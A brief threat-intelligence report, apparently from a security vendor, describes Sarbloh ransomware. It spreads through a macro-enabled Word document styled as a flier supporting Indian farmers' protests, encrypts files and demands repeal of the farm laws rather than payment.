Since last year, many farmers in India have been protesting in New Delhi in opposition to new bills passed in 2020, which remove some of the restrictions on farmers and how they sell their goods in India. In apparent support of these farmers, a new ransomware has been created and is being distributed through malicious Word document. The delivery method is unknown, but once a victim opens the Word document, it will ask the victim to enable macros to see the full content. On the surface, the document appears to be a flier in support of the farmers. Once the macros are enabled, a document called putty.exe is downloaded using the Windows utility bitsadmin.exe. Once that happens, files on the computer will start being encrypted and having their names appended. After encryption, a “READ ME” file is left behind explaining to the victim that they will not get their files back until the Indian Government repeals their new laws. There is no option to pay a ransom in this case. The ransomware is known as Sarbloh and appears to be named after the Sarbloh Granth, a book of scriptures related to Sikhism.
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense Russia’s invasion of Ukraine increased